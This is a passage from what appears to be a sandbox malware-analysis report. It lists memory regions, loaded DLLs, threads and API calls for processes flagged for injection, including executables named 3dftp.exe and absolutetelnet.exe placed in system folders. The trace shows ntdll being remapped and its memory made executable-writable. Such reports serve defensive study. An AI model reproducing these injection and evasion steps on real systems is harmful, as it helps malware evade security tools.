"c:\\windows\\syswow64\\usp10.dll") Region: id = 2627 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2628 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2629 start_va = 0x765c0000 end_va = 0x766b4fff monitored = 0 entry_point = 0x765c1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2630 start_va = 0x766c0000 end_va = 0x766cbfff monitored = 0 entry_point = 0x766c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2631 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2632 start_va = 0x767d0000 end_va = 0x7684afff monitored = 0 entry_point = 0x767d1aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 2633 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2634 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2635 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2636 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2637 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2638 start_va = 0x76ca0000 end_va = 0x76ca4fff monitored = 0 entry_point = 0x76ca1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2639 start_va = 0x76cb0000 end_va = 0x76e4cfff monitored = 0 entry_point = 0x76cb17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2640 start_va = 0x76e50000 end_va = 0x7704afff monitored = 0 entry_point = 0x76e522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2641 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2642 start_va = 0x77130000 end_va = 0x77174fff monitored = 0 entry_point = 0x771311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2643 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2644 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2645 start_va = 0x773c0000 end_va = 0x773d1fff monitored = 0 entry_point = 0x773c1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2646 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2647 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2648 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2649 start_va = 0x774b0000 end_va = 0x774b5fff monitored = 0 entry_point = 0x774b1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2650 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2651 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2652 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2653 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2654 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2655 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2656 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2657 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2658 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2659 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2660 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2661 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2662 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2663 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2664 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2665 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2666 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2667 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2668 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2669 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2671 start_va = 0x2d40000 end_va = 0x2e24fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 2672 start_va = 0x4830000 end_va = 0x49affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2673 start_va = 0x2260000 end_va = 0x2263fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Thread: id = 155 os_tid = 0x850 Thread: id = 156 os_tid = 0x840 Thread: id = 157 os_tid = 0x834 Thread: id = 158 os_tid = 0x830 Thread: id = 159 os_tid = 0x82c Thread: id = 160 os_tid = 0x828 Thread: id = 161 os_tid = 0x824 Thread: id = 162 os_tid = 0x820 [0153.442] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x58f7a0 | out: HeapArray=0x58f7a0*=0x360000) returned 0x5 [0153.449] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x58f4ac, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.452] NtCreateFile (in: FileHandle=0x58f4cc, DesiredAccess=0x1200a0, ObjectAttributes=0x58f494*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x58f4b4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x58f4cc*=0x564, IoStatusBlock=0x58f4b4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0153.462] RtlFreeHeap (HeapHandle=0x360000, Flags=0x0, BaseAddress=0x3b6060) returned 1 [0153.464] NtCreateSection (in: SectionHandle=0x58f434, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x564 | out: SectionHandle=0x58f434*=0x280) returned 0x0 [0153.468] NtMapViewOfSection (in: SectionHandle=0x280, ProcessHandle=0xffffffff, BaseAddress=0x58f430*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x58f42c*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x58f430*=0x4830000, SectionOffset=0x0, ViewSize=0x58f42c*=0x180000) returned 0x40000003 [0153.470] NtClose (Handle=0x564) returned 0x0 [0153.470] NtClose (Handle=0x280) returned 0x0 [0153.474] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x58f4e4*=0x4830000, NumberOfBytesToProtect=0x58f4f4, NewAccessProtection=0x40, OldAccessProtection=0x58f4e0 | out: BaseAddress=0x58f4e4*=0x4830000, NumberOfBytesToProtect=0x58f4f4, OldAccessProtection=0x58f4e0*=0x2) returned 0x0 [0153.475] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x58f4d8*=0x4840000, NumberOfBytesToProtect=0x58f4dc, NewAccessProtection=0x40, OldAccessProtection=0x58f4e0 | out: BaseAddress=0x58f4d8*=0x4840000, NumberOfBytesToProtect=0x58f4dc, OldAccessProtection=0x58f4e0*=0x20) returned 0x0 [0153.487] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x58f4d8*=0x4920000, NumberOfBytesToProtect=0x58f4dc, NewAccessProtection=0x40, OldAccessProtection=0x58f4e0 | out: BaseAddress=0x58f4d8*=0x4920000, NumberOfBytesToProtect=0x58f4dc, OldAccessProtection=0x58f4e0*=0x20) returned 0x0 [0153.488] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x58f4d8*=0x4930000, NumberOfBytesToProtect=0x58f4dc, NewAccessProtection=0x40, OldAccessProtection=0x58f4e0 | out: BaseAddress=0x58f4d8*=0x4930000, NumberOfBytesToProtect=0x58f4dc, OldAccessProtection=0x58f4e0*=0x8) returned 0x0 [0153.488] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x58f4d8*=0x4940000, NumberOfBytesToProtect=0x58f4dc, NewAccessProtection=0x40, OldAccessProtection=0x58f4e0 | out: BaseAddress=0x58f4d8*=0x4940000, NumberOfBytesToProtect=0x58f4dc, OldAccessProtection=0x58f4e0*=0x2) returned 0x0 [0153.491] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x58f4d8*=0x49a0000, NumberOfBytesToProtect=0x58f4dc, NewAccessProtection=0x40, OldAccessProtection=0x58f4e0 | out: BaseAddress=0x58f4d8*=0x49a0000, NumberOfBytesToProtect=0x58f4dc, OldAccessProtection=0x58f4e0*=0x2) returned 0x0 Process: id = "12" image_name = "3dftp.exe" filename = "c:\\program files\\windows defender\\3dftp.exe" page_root = "0x4d7a8000" os_pid = "0xbc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Defender\\3dftp.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2674 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2675 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2676 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2677 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2678 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2679 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2680 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2681 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2682 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2683 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2684 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2685 start_va = 0x370000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2686 start_va = 0x4c0000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2687 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2688 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2689 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2690 start_va = 0xee0000 end_va = 0xef6fff monitored = 0 entry_point = 0xee14a1 region_type = mapped_file name = "3dftp.exe" filename = "\\Program Files\\Windows Defender\\3dftp.exe" (normalized: "c:\\program files\\windows defender\\3dftp.exe") Region: id = 2691 start_va = 0xf00000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 2692 start_va = 0x2300000 end_va = 0x2cc3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 2693 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2694 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2695 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2696 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2697 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2698 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2699 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2700 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2701 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2702 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2703 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2704 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2705 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2706 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2707 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2708 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2709 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2710 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2711 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2712 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2713 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2714 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2715 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2716 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2717 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2718 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2719 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2720 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2721 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2722 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2723 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2724 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2726 start_va = 0x540000 end_va = 0x655fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Thread: id = 163 os_tid = 0xbc8 Process: id = "13" image_name = "absolutetelnet.exe" filename = "c:\\program files (x86)\\windows nt\\absolutetelnet.exe" page_root = "0x4e1ae000" os_pid = "0xbcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Windows NT\\absolutetelnet.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows NT\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2727 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2728 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2729 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2730 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2731 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2732 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2733 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2734 start_va = 0xe0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2735 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2736 start_va = 0x240000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2737 start_va = 0x280000 end_va = 0x35efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 2738 start_va = 0x380000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2739 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2740 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2741 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2742 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 2743 start_va = 0xfd0000 end_va = 0xfe6fff monitored = 0 entry_point = 0xfd14a1 region_type = mapped_file name = "absolutetelnet.exe" filename = "\\Program Files (x86)\\Windows NT\\absolutetelnet.exe" (normalized: "c:\\program files (x86)\\windows nt\\absolutetelnet.exe") Region: id = 2744 start_va = 0xff0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 